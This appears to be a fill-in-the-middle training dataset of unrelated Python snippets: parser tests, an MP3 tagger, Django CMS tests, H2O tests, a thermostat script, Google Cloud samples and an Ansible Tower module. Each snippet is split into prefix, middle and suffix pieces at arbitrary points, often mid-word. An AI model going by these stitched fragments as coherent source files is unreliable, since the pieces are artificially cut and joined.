prefix
stringlengths
0
918k
middle
stringlengths
0
812k
suffix
stringlengths
0
962k
# Make
sure to update package.json, too! version_info = (4, 3, 0) __version__ = '.'.join(map(str,
version_info))
#!/usr/bin/env python # -*- coding: utf-8 -*- #Author: Tim Henderson #Email: tim.
tadh@hackthology
.com #For licensing see the LICENSE file in the top level directory. from predictive import parse def t_expr_compound(): assert (4*3/2) == parse('4*3/2') assert (4/2*3) == parse('4/2*3') assert ((3+9)*4/8) == parse('(3+9)*4/8') assert (((9-3)*(5-3))/2 + 2) == parse('((9-3)*(5-3))/2 + 2') assert (5 * 4 / 2 - 10 + 5 - 2 + 3) == parse('5 * 4 / 2 - 10 + 5 - 2 + 3') assert (5 / 4 * 2 + 10 - 5 * 2 / 3) == parse('5 / 4 * 2 + 10 - 5 * 2 / 3')
import urllib2 import eyed3 import mechanize import os from bs4 import BeautifulSoup as bs import unicodedata as ud import sys import string reload(sys) sys.setdefaultencoding('utf-8') class Song: def __init__(self, keyword, filename, albumart, aaformat, dd='/home/praneet/Music/'): self.info = keyword.split('@') self.filename = os.path.join(dd, filename).encode('utf-8') self.keyword = urllib2.quote(('').join(self.info)) self.albumart = albumart self.aaformat = aaformat self.album = '' self.artist = string.capwords(self.info[1]) self.title = self.info[0] self.feat = ' ' self.genre = 'Unknown' self.dd = dd self.fetchID3() def fetchID3(self): browser = mechanize.Browser() browser.set_handle_robots(False) browser.addheaders = [('User-agent','Mozilla')] searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' song') html = browser.open(searchURL) soup = bs(html, 'html.parser') souplist = soup.findAll(attrs={'class':'_o0d'}) for i in range(1,len(souplist)): if souplist[i].get_text().split(':')[0].lower() == 'album' or souplist[i].get_text().split(':')[0].lower() == 'movie': self.album = souplist[i].get_text().split(':')[1] print 'album ',souplist[i].get_text().split(':')[1] elif souplist[i].get_text().split(':')[0].lower() == 'artist' or souplist[i].get_text().split(':')[0].lower() == 'artists': self.artist = souplist[i].get_text().split(':')[1] print 'artist ',souplist[i].get_text().split(':')[1] elif souplist[i].get_text().split(':')[0].lower() == 'genre' or souplist[i].get_text().split(':')[0].lower() == 'genres': self.genre = souplist[i].get_text().split(':')[1] print 'genre ',souplist[i].get_text().split(':')[1] elif souplist[i].get_text().split(':')[0].lower() == 'featured artist' or souplist[i].get_text().split(':')[0].lower() == 'featured artists': self.feat = souplist[i].get_text().split(':')[1] print 'featured artist ',souplist[i].get_text().split(':')[1] else: pass self.fetchalbum() def f
etchalbum(self
): browser = mechanize.Browser() browser.set_handle_robots(False) browser.addheaders = [('User-agent','Mozilla')] searchURL = "https://www.google.co.in/search?site=imghp&source=hp&biw=1414&bih=709&q="+urllib2.quote(self.title+' '+self.artist+' album name') html = browser.open(searchURL) soup = bs(html, 'html.parser') for i in soup.findAll(attrs={'class':'_B5d'}): if self.album == '': self.album = i.get_text() print self.album break if self.album == '': if not self.info[2].isspace() and self.info[2] != '': self.album = string.capwords(self.info[2]) else: self.album = self.title + '- Single' print 'album', self.album def updateID3(self): audiofile = eyed3.load(self.filename) try: audiofile.tag.artist = unicode(self.artist, "utf-8") except: audiofile.tag.artist = self.artist try: audiofile.tag.album = unicode(self.album, "utf-8") except: audiofile.tag.album = self.album title = '' if self.feat == ' ': title = self.title else: title = self.title+' ft. '+self.feat try: audiofile.tag.title = unicode(title, "utf-8") except: audiofile.tag.title = title try: audiofile.tag.genre = unicode(self.genre, "utf-8") except: audiofile.tag.genre = self.genre audiofile.tag.images.set(3, open(self.albumart,'rb').read(), 'image/'+self.aaformat) audiofile.tag.save() if not os.path.isfile(self.dd+title+'.mp3'): os.rename(self.filename, self.dd+title.rstrip()+'.mp3') else: newTitle = raw_input('Similar file already exits, enter new file name: ') os.rename(self.filename, self.dd+newTitle.rstrip()+'.mp3') print 'update complete' os.remove(self.albumart) # newsong = Song('Rockabye','Rockabye.mp3', 'rockabye','rockabye album art.jpeg','jpeg') # newsong.updateID3()
etting. """ apphooks = ( '%s.%s' % (APP_MODULE, APP_NAME), ) with SettingsOverride(CMS_APPHOOKS=apphooks): apphook_pool.clear() hooks = apphook_pool.get_apphooks() app_names = [hook[0] for hook in hooks] self.assertEqual(len(hooks), 1) self.assertEqual(app_names, [APP_NAME]) apphook_pool.clear() def test_implicit_apphooks(self): """ Test implicit apphook loading with INSTALLED_APPS + cms_app.py """ apps = ['cms.test_utils.project.sampleapp'] with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() hooks = apphook_pool.get_apphooks() app_names = [hook[0] for hook in hooks] self.assertEqual(len(hooks), 1) self.assertEqual(app_names, [APP_NAME]) apphook_pool.clear() def test_apphook_on_root(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("apphooked-page", "nav_playground.html", "en", created_by=superuser, published=True, apphook="SampleApp") blank_page = create_page("not-apphooked-page", "nav_playground.html", "en", created_by=superuser, published=True, apphook="", slug='blankapp') english_title = page.title_set.all()[0] self.assertEquals(english_title.language, 'en') create_title("de", "aphooked-page-de", page, apphook="SampleApp") self.assertTrue(page.publish()) self.assertTrue(blank_page.publish()) response = self.client.get(self.get_pages_root()) self.assertTemplateUsed(response, 'sampleapp/home.html') response = self.client.get('/en/blankapp/') self.assertTemplateUsed(response, 'nav_playground.html') apphook_pool.clear() def test_apphook_on_root_reverse(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("apphooked-page", "nav_playground.html", "en", created_by=superuser, published=True, apphook="SampleApp") create_title("de", "aphooked-page-de", page, apphook="SampleApp") self.assertTrue(page.publish()) self.assertFalse(reverse('sample-settings').startswith('//')) apphook_pool.clear() def test_get_page_for_apphook(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("home", "nav_playground.html", "en", created_by=superuser, published=True) create_title('de', page.get_title(), page) child_page = create_page("child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=page) create_title('de', child_page.get_title(), child_page) child_child_page = create_page("child_child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp') create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp') child_child_page.publish() # publisher_public is set to draft on publish, issue with onetoone reverse child_child_page = self.reload(child_child_page) en_title = child_child_page.publisher_public.get_title_obj('en') path = reverse('en:sample-settings') request = self.get_request(path) request.LANGUAGE_CODE = 'en' attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash self.assertEquals(attached_to_page.pk, en_title.page.pk) response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/home.html') self.assertContains(response, en_title.title) de_title = child_child_page.publisher_public.get_title_obj('de') path = reverse('de:sample-settings') request = self.get_request(path) request.LANGUAGE_CODE = 'de' attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix self.assertEquals(attached_to_page.pk, de_title.page.pk) response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/home.html') self.assertContains(response, de_title.title) apphook_pool.clear() def test_include_urlconf(self): with SettingsOverride(ROOT_URLCONF='cms.test_utils.project.second_urls_for_apphook_tests'): apphook_pool.clear() superuser = User.objects.create_superuser('admin', 'admin@admin.com', 'admin') page = create_page("home", "nav_playground.html", "en", created_by=superuser, published=True) create_title('de', page.get_title(), page) child_page = create_page("child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=page) create_title('de', child_page.get_title(), child_page) child_child_page = create_page("child_child_page", "nav_playground.html", "en", created_by=superuser, published=True, parent=child_page, apphook='SampleApp') create_title("de", child_child_page.get_title(), child_child_page, apphook='SampleApp') child_child_page.publish() path = reverse('extra_second') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test included urlconf") path = reverse('extra_first') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTem
plateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test urlconf") path = reverse('de:extra_first') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test urlconf") pa
th = reverse('de:extra_second') response = self.client.get(path) self.assertEquals(response.status_code, 200) self.assertTemplateUsed(response, 'sampleapp/extra.html') self.assertContains(response, "test included urlconf") apphook_pool.clear() def test_apphook_breaking_under_home_with_new_path_caching(self): with SettingsOverride(CMS_MODERATOR=False, CMS_PERMISSION=False): home = create_page("home", "nav_playground.html", "en", published=True) child = create_page("child", "nav_playground.html", "en", published=True, parent=home) # not-home is what breaks stuff, because it contains the slug of the home page not_home = create_page("not-home", "nav_playground.html", "en", published=True, parent=child)
from django.conf.urls import patterns, url, includ
e fr
om .views import GalleryListView, GalleryDetailView urlpatterns = patterns("", url( regex=r"^gallery_list/$", view=GalleryListView.as_view(), name="gallery_list", ), url( regex=r"^gallery/(?P<pk>\d+)/$", view=GalleryDetailView.as_view(), name="gallery_detail", ), )
# Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain
a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed
under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Flag related helpers for sole tenancy related commands.""" from googlecloudsdk.command_lib.compute import flags as compute_flags from googlecloudsdk.command_lib.compute import scope as compute_scope SOLE_TENANCY_HOST_TYPE_RESOLVER = compute_flags.ResourceResolver.FromMap( 'sole tenancy host type', { compute_scope.ScopeEnum.ZONE: 'compute.hostTypes'})
import unittest, time, sys, re sys.path.extend(['.','..','../..','py']) import h2o, h2o_nn, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_gbm def write_syn_dataset(csvPathname, rowCount, rowDataTrue, rowDataFalse, outputTrue, outputFalse): dsf = open(csvPathname, "w+") for i in range(int(rowCount/2)): dsf.write(rowDataTrue + ',' + outputTrue + "\n") for i in range(int(rowCount/2)): dsf.write(rowDataFalse + ',' + outputFalse + "\n") dsf.close() class test_NN_twovalues(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): # fails with 3 global SEED SEED = h2o.setup_random_seed() h2o.init(1, java_heap_GB=4) # h2b.browseTheCloud() @classmethod def tearDownClass(cls):
h2o.tear_down_cloud(h2o.nodes) def test_DeepLearning_twovalues(self): SYNDATASETS_DIR = h2o.make_syn_dir() csvFilename = "syn_twovalues.csv" csvPathname = SYNDATASETS_DIR + '/' + csvFilename rowDataTrue = "1, 0, 65, 1, 2, 1, 1, 4, 1, 4, 1, 4" rowDataFalse = "0, 1, 0, -1, -2, -1, -1, -4, -1, -4, -1, -4"
twoValueList = [ ('A','B',0, 14), ('A','B',1, 14), (0,1,0, 12), (0,1,1, 12), (0,1,'NaN', 12), (1,0,'NaN', 12), (-1,1,0, 12), (-1,1,1, 12), (-1e1,1e1,1e1, 12), (-1e1,1e1,-1e1, 12), ] trial = 0 for (outputTrue, outputFalse, case, coeffNum) in twoValueList: write_syn_dataset(csvPathname, 20, rowDataTrue, rowDataFalse, str(outputTrue), str(outputFalse)) start = time.time() hex_key = csvFilename + "_" + str(trial) model_key = 'trial_' + str(trial) + '.hex' validation_key = hex_key parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=hex_key) print "using outputTrue: %s outputFalse: %s" % (outputTrue, outputFalse) inspect = h2o_cmd.runInspect(None, parseResult['destination_key']) print "\n" + csvPathname, \ " numRows:", "{:,}".format(inspect['numRows']), \ " numCols:", "{:,}".format(inspect['numCols']) response = inspect['numCols'] response = 'C' + str(response) kwargs = { 'ignored_cols' : None, 'response' : response, 'classification' : 1, 'activation' : 'Tanh', #'input_dropout_ratio' : 0.2, 'hidden' : '113,71,54', 'rate' : 0.01, 'rate_annealing' : 1e-6, 'momentum_start' : 0, 'momentum_stable' : 0, 'l1' : 0.0, 'l2' : 1e-6, 'seed' : 80023842348, 'loss' : 'CrossEntropy', #'max_w2' : 15, 'initial_weight_distribution' : 'UniformAdaptive', #'initial_weight_scale' : 0.01, 'epochs' : 100, 'destination_key' : model_key, 'validation' : hex_key, } timeoutSecs = 60 start = time.time() h2o_cmd.runDeepLearning(parseResult=parseResult, timeoutSecs=timeoutSecs, **kwargs) print "trial #", trial, "Deep Learning end on ", csvFilename, ' took', time.time() - start, 'seconds' #### Now score using the model, and check the validation error expectedErr = 0.00 relTol = 0.01 predict_key = 'Predict.hex' kwargs = { 'data_key': validation_key, 'destination_key': predict_key, 'model_key': model_key } predictResult = h2o_cmd.runPredict(timeoutSecs=timeoutSecs, **kwargs) h2o_cmd.runInspect(key=predict_key, verbose=True) kwargs = { } predictCMResult = h2o.nodes[0].predict_confusion_matrix( actual=validation_key, vactual=response, predict=predict_key, vpredict='predict', timeoutSecs=timeoutSecs, **kwargs) cm = predictCMResult['cm'] print h2o_gbm.pp_cm(cm) actualErr = h2o_gbm.pp_cm_summary(cm)/100. print "actual classification error:" + format(actualErr) print "expected classification error:" + format(expectedErr) if actualErr != expectedErr and abs((expectedErr - actualErr)/expectedErr) > relTol: raise Exception("Scored classification error of %s is not within %s %% relative error of %s" % (actualErr, float(relTol)*100, expectedErr)) trial += 1 if __name__ == '__main__': h2o.unit_main()
de, default_temp) config.default_temp_away = default_temp else: config.indoor_temp_target=default_temp_away elif (0 <= now.hour < 7) and home_status=='home': config.mode='night' if config.mode == default_temp_mode and default_temp != default_temp_night: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_night = default_temp else: config.indoor_temp_target = default_temp_night elif 7 <= now.hour and home_status=='home': config.mode='day' if config.mode == default_temp_mode and default_temp != default_temp_day: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_day = default_temp else: config.indoor_temp_target = default_temp_day else: # Weekend if home_status=='away': config.mode='away' if config.mode == default_temp_mode and default_temp != default_temp_away: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_away = default_temp else: config.indoor_temp_target=default_temp_away elif (0 <= now.hour < 8) and home_status=='home': config.mode='night' if config.mode == default_temp_mode and default_temp != default_temp_night: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_night = default_temp else: config.indoor_temp_target = default_temp_night elif 8 <= now.hour and home_status=='home': config.mode='day' if config.mode == default_temp_mode and default_temp != default_temp_day: config.indoor_temp_target = default_temp print "When mode is %s it should be %s degrees Celsius" % (config.mode, default_temp) config.default_temp_day = default_temp else: config.indoor_temp_target = default_temp_day config.write return config def checkPresence(config): """Pings all configured devices to determine who's at home""" no_of_users_at_home=0 last_time_home=config.last_time_home now = mktime(datetime.now().utctimetuple()) for device in config.presence_devices_wifi: if device['timestamp'] >= now - 600: print "Assuming %s is still at home" % device['owner'] no_of_users_at_home+=1 if no_of_users_at_home == 0: for device in config.presence_devices_wifi: if ping(device['ip_address']) > 0: print "%s seems to be at home" % device['owner'] device['timestamp']=now last_time_home=now no_of_users_at_home+=1 if no_of_users_at_home > 0: home_status='home' else: home_status='away' else: home_status='home' return last_time_home, home_status, config.presence_devices_wifi def btConnection(config, sendchar = 'n', close_after = True): """Creates a bluetooth connection to the relay, sends a command and returns the result""" print("opening Bluetooth connection") i = 1 timed_out = False while True: try: furnace_socket=bluetooth.BluetoothSocket( bluetooth.RFCOMM ) if furnace_socket.getpeername()[0] != config.bluetooth_addr: furnace_socket.connect((config.bluetooth_addr, config.bluetooth_port)) furnace_socket.settimeout(10) print "Bluetooth connected" furnace_socket.send(sendchar+'[') response_byte = furnace_socket.recv(1) break except bluetooth.btcommon.BluetoothError as error: print(".") print error time.sleep(1) i += 1 if i >= 30 and sendchar != '': timed_out = True break if close_after: print("closing Bluetooth connection") furnace_socket.close() if not timed_out: response_bin = bin(ord(response_byte))[2:].zfill(config.relay_channels) response_bit_list = map(int, list(response_bin)) response_bit_list.reverse() return response_bit_list else: return False def turnOnFurnace(config, furnace_no): """turns on a furnace using the bluetooth relay""" channels = config.relay_channels if furnace_no <= channels: relaychar = chr(101+furnace_no) elif furnace_no == channels + 1: relaychar = 'd' else: print("Error: no such furnace!") #raise furnace_state = btConnection(config, relaychar, close_after=False) if furnace_state: if furnace_state[furnace_no]: print("furnace %s turned on") % furnace_no elif sum(furnace_state) == channels: print("all furnaces turned on") else: print("Error: furnace has not been turned on!") #raise else: print("Error: furnace has not been turned on!") #raise return furnace_state def turnOffFurnace(config, furnace_no): """turns off a furnace using the bluetooth relay""" channels = config.relay_channels if furnace_no <= channels: relaychar = chr(111+furnace_no) elif furnace_no == channels + 1: relaychar = 'n' else: print("Error: no such furnace!") #raise furnace_state = btConnection(config, relaychar, close_after=True) if furnace_state[furnace_no]: print("Error: furnace has not been turned off!") #raise elif sum(furnace_state) == 0: print("all furnaces turned off") else: print("furnace %s turned off") % furnace_no retu
rn furnace_state def
checkOutdoorTemp(zip_code): """Gets outdoor temperature for our ZIP code from Yahoo!""" try: yahoo_com_result = pywapi.get_weather_from_yahoo( zip_code, units = 'metric' ) outdoor_temperature = int(yahoo_com_result['condition']['temp']) except (KeyError, AttributeError, httplib.BadStatusLine): outdoor_temperature = 0 return outdoor_temperature def checkIndoorTemp(config): """Gets indoor temperature from USB thermometer using command line tool""" # repeat forever - temper is very flaky tries = 0 while True: tries += 1 try: indoor_temp = float(subprocess.Popen("/usr/local/bin/temper", stdout=subprocess.PIPE).communicate()[0]) break except ValueError: print "Oops! Did not get a temperature. Trying again..." if tries == 10: # better turn off the furnace, probably an issue with the USB device turnOffFurnace(config, config.primary_furnace) return indoor_temp def transmit(config, outdoor_temp, indoor_temp): """Transmits the current state to the server for reporting and gets targets set in the web GUI (if any exist)""" furnace_state=config.furnace_state primary_furnace=config.primary_furnace indoor_temp_target_dict={} # round up or down to half degrees C rounded_indoor_temp = round(indoor_temp*10/5)/2 print "It is %s degrees Celsius - target is %s (outdoors it's %s degrees Celsius)" % (rounded_indoor_temp, config.indoor_temp_target, outdoor_temp) values = { 't' : indoor_temp, 'g' : config.indoor_temp_target, 'h' : config.home_status, 'f' : furnace_state[primary_furnace], 'r' : config.room, 's' : config.secret, 'o' : outdoo
#### NOTICE: THIS FILE IS AUTOGENERATED #### MODIFICATIONS MAY BE L
OST IF DONE IMPROPERLY #### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES from swgpy.object import * def create(kernel): result = Creature() result.template = "object/mobile/shared_dressed_binayre_ruffian_trandoshan_male_01.iff" result.attribute_template_id = 9 result.stfName("npc_name","trandoshan_base_male") #### BEGIN MODIFICATIONS #### #### END MODIFICATIONS #### return resul
t
# -*- coding: utf-8 -*- # # This tool helps you rebase your package to the latest version # Copyright (C) 2013-2019 Red Hat, Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # Authors: Petr Hráček <phracek@redhat.com> # Tomáš Hozza <thozza@redhat.com> # Nikola Forró <nforro@redhat.com> # František Nečas <fifinecas@seznam.cz> import logging from typing import cast from rebasehelper.logger import CustomLogger logger: CustomLogger = cast(CustomLogger, logging.getLogger(__name__)) class InputHelper: """Class for command line interaction with the user.""" @staticmethod def strtobool(message): """Converts a user message to a corresponding truth value. This method is a replacement for deprecated strtobool from distutils, its behaviour remains the same. Args: message (str): Message to evaluate. Returns: bool: True on 'y', 'yes', 't', 'true', 'on' and '1'. False on 'n', 'no', 'f', 'false', 'off' and '0'. Raises: ValueError: On any other value. """ message = message.lower() if message in ('y', 'yes', 't', 'true', 'on', '1'): return True elif message in ('n', 'no', 'f', 'false', 'off', '0'): return False raise ValueError('No conversion to truth value for "{}"'.format(message)) @classmethod def get_message(cls, mes
sage, default_yes=True, any_input=False):
"""Prompts a user with yes/no message and gets the response. Args: message (str): Prompt string. default_yes (bool): If the default value should be YES. any_input (bool): Whether to return default value regardless of input. Returns: bool: True or False, based on user's input. """ if default_yes: choice = '[Y/n]' else: choice = '[y/N]' if any_input: msg = '{0} '.format(message) else: msg = '{0} {1}? '.format(message, choice) while True: user_input = input(msg).lower() if not user_input or any_input: return True if default_yes else False try: user_input = cls.strtobool(user_input) except ValueError: logger.error('You have to type y(es) or n(o).') continue if any_input: return True else: return bool(user_input)
#!/usr/bin/env python #coding=utf8 import datetime import logging from handler import UserBaseHandler from lib.route import route from lib.util import vmobile @route(r'/user', name='user') #用户后台首页 class UserHandler(UserBaseHandler): def get(self): user = self.get_current_user() try: self.session['user'] = user self.session.save() except:
pass self.render('user/index.html') @route(r'/user/profile', name='user_profile') #用户资料 class ProfileHandler(UserBaseHandler):
def get(self): self.render('user/profile.html') def post(self): self.redirect('/user/profile')
# -*- coding: utf-8 -*- # Copyright 2022 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Generated code. DO NOT EDIT! # # Snippet for GetGlossary # NOTE: This snippet has been automatically generated for illustrative purposes only. # It may require modifications to work in your environment. # To install the latest published package dependency, execute the following: # python3 -m pip install google-cloud-translate # [START translate_v3beta1_generated_TranslationServic
e_GetGlossary_sync] from google.clo
ud import translate_v3beta1 def sample_get_glossary(): # Create a client client = translate_v3beta1.TranslationServiceClient() # Initialize request argument(s) request = translate_v3beta1.GetGlossaryRequest( name="name_value", ) # Make the request response = client.get_glossary(request=request) # Handle the response print(response) # [END translate_v3beta1_generated_TranslationService_GetGlossary_sync]
from galaxy.test.base.twilltestcase import TwillTestCase #from twilltestcase import TwillTestCase class EncodeTests(TwillTestCase): def test_00_first(self): # will run first due to its name """3B_GetEncodeData: Clearing histo
ry""" self.clear_history() def test_10_Encode_Data(self): """3B_GetEncodeData: Getting encode data"""
self.run_tool('encode_import_chromatin_and_chromosomes1', hg17=['cc.EarlyRepSeg.20051216.bed'] ) # hg17=[ "cc.EarlyRepSeg.20051216.bed", "cc.EarlyRepSeg.20051216.gencode_partitioned.bed", "cc.LateRepSeg.20051216.bed", "cc.LateRepSeg.20051216.gencode_partitioned.bed", "cc.MidRepSeg.20051216.bed", "cc.MidRepSeg.20051216.gencode_partitioned.bed" ] ) self.wait() self.check_data('cc.EarlyRepSeg.20051216.bed', hid=1) # self.check_data('cc.EarlyRepSeg.20051216.gencode_partitioned.bed', hid=2) # self.check_data('cc.LateRepSeg.20051216.bed', hid=3) # self.check_data('cc.LateRepSeg.20051216.gencode_partitioned.bed', hid=4) # self.check_data('cc.MidRepSeg.20051216.bed', hid=5) # self.check_data('cc.MidRepSeg.20051216.gencode_partitioned.bed', hid=6)
from django.conf.urls import url from django.contrib.auth.views import login, \ logout, \ logout_then_login, \ password_change, \ password_change_done,
\ password_reset, \ password_reset_done, \ password_reset_confirm, \ password_reset_complete from . import views urlpatterns = [ url(r'^$', views.dashboard, name=
'dashboard'), # login / logout urls url(r'^login/$', view=login, name='login'), url(r'^logout/$', view=logout, name='logout'), url(r'^logout-then-login/$', view=logout_then_login, name='logout_then_login'), # change password urls url(r'^password-change/$', view=password_change, name='password_change'), url(r'^password-change/done/$', view=password_change_done, name='password_change_done'), # restore password urls url(r'^password-reset/$', view=password_reset, name='password_reset'), url(r'^password-reset/done/$', view=password_reset_done, name='password_reset_done'), url(r'^password-reset/confirm/(?P<uidb64>[-\w]+)/(?P<token>[-\w]+)/$', view=password_reset_confirm, name='password_reset_confirm'), url(r'^password-reset/complete/$', view=password_reset_complete, name='password_reset_complete'), ]
from lacuna.building import MyBuilding class fis
sion(MyBuilding): path = 'fission' def __init__( self, client, body_id:int = 0, building_id:int = 0 ): super().__init__( client, body_id,
building_id )
import unittest from nose.tools import assert_equals from robotide.robotapi import TestCaseFile, TestCaseFileSettingTable from robotide.controller.filecontrollers import TestCaseFileController from robotide.controller.tablecontrollers import ImportSettingsController VALID_NAME = 'Valid name' class TestCaseNameValidationTest(unittest.TestCase): def setUp(self): self.ctrl = TestCaseFileController(TestCaseFile()).tests def test_valid_name(self): self._validate_name(VALID_NAME, True) def test_empty_name(self): self._validate_name('', False) def test_name_with_only_whitespace(self): self._validate_name(' ', False) def test_duplicate_name(self): self.ctrl.new(VALID_NAME) self._validate_name(VALID_NAME, False) self._validate_name(VALID_NAME.upper(), False) self._validate_name(VALID_NAME.replace(' ', '_'), False) def test_duplicate_name_when_previous_name_known(self): ctrl = self.ctrl.new(VALID_NAME) self._validate_name(VALID_NAME, True, ctrl) self._validate_name(VALID_NAME.upper(), True, ctrl) self._validate_name(VALID_NAME.replace(' ', '_'), True, ctrl) def _validate_name(self, name, expected_valid, named_ctrl=None): valid = not bool(self.ctrl.validate_name(name, named_ctrl).error_message) assert_equals(vali
d, expected_valid) class TestCaseCreationTest(unittest.TestCase): def setUp(self): self.ctrl = TestCaseFileController(TestCaseF
ile()).tests def test_whitespace_is_stripped(self): test = self.ctrl.new(' ' + VALID_NAME + '\t \n') assert_equals(test.name, VALID_NAME) class LibraryImportListOperationsTest(unittest.TestCase): def setUp(self): self._parent = lambda:0 self._parent.mark_dirty = lambda:0 self._parent.datafile_controller = self._parent self._parent.update_namespace = lambda:0 self._table = TestCaseFileSettingTable(lambda:0) self.ctrl = ImportSettingsController(self._parent, self._table) self._lib1 = self.ctrl.add_library('libbi1', '', '') self._lib2 = self.ctrl.add_library('libbi2', '', '') self.assertEqual([self._lib1.name, self._lib2.name], [l.name for l in self.ctrl]) def test_move_up(self): self.ctrl.move_up(1) self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl]) def test_move_down(self): self.ctrl.move_down(0) self.assertEqual([self._lib2.name, self._lib1.name], [l.name for l in self.ctrl])
#!/usr/bin/python # coding: utf-8 -*- # (c) 2017, Wayne Witzel III <wayne@riotousliving.com> # # This module is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This software is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this software. If not, see <http://www.gnu.org/licenses/>. ANSIBLE_METADATA = {'metadata_version': '1.0', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: tower_job_launch author: "Wayne Witzel III (@wwitzel3)" version_added: "2.3" short_description: Launch an Ansible Job. description: - Launch an Ansible Tower jobs. See U(https://www.ansible.com/tower) for an overview. options: job_template: description: - Name of the job_template to use. required: True job_explanation: description: - Job explanation field. default: null job_type: description: - Job_type to use for the job, only used if prompt for job_type is set. choices: ["run", "check", "scan"] default: null inventory: description: - Inventory to use for the job, only used if prompt for inventory is set. default: null credential: description: - Credential to use for job, only used if prompt for credential is set. default: null extra_vars: description: - Extra_vars to use for the job_template. Use '@' for a file. default: null limit: description: - Limit to use for the job_template. default: null tags: description: - Specific tags to use for from playbook. default: null use_job_endpoint: description: - Disable launching jobs from job template. default: False extends_documentation_fragment: tower ''' EXAMPLES = ''' - name: Launch a job tower_job_launch: job_template: "My Job Template" register: job - name: Wait for job max 120s tower_job_wait: job_id: job.id timeout: 120 ''' RETURN = ''' id: description: job id of the newly launched job returned: success type: int sample: 86 status: description: status of newly launched job returned: success type: string sample: pending ''' from ansible.module_utils.basic import AnsibleModule try: import tower_cli import tower_cli.utils.exceptions as exc from tower_cli.conf import settings from
ansible.module_utils.ansible_tower import ( tower_auth_config, tower_check_mode, tower_argument_spec, ) HAS_TOWER_CLI = True except ImportError: HAS_TOWER_CLI = False def main(): argument_spec = tower_argument_spec() argument_s
pec.update(dict( job_template=dict(required=True), job_type=dict(choices=['run', 'check', 'scan']), inventory=dict(), credential=dict(), limit=dict(), tags=dict(type='list'), extra_vars=dict(type='list'), )) module = AnsibleModule( argument_spec, supports_check_mode=True ) if not HAS_TOWER_CLI: module.fail_json(msg='ansible-tower-cli required for this module') json_output = {} tags = module.params.get('tags') tower_auth = tower_auth_config(module) with settings.runtime_values(**tower_auth): tower_check_mode(module) try: params = module.params.copy() if isinstance(tags, list): params['tags'] = ','.join(tags) job = tower_cli.get_resource('job') lookup_fields = ('job_template', 'inventory', 'credential') for field in lookup_fields: try: name = params.pop(field) result = tower_cli.get_resource(field).get(name=name) params[field] = result['id'] except exc.NotFound as excinfo: module.fail_json(msg='Unable to launch job, {0}/{1} was not found: {2}'.format(field, name, excinfo), changed=False) result = job.launch(no_input=True, **params) json_output['id'] = result['id'] json_output['status'] = result['status'] except 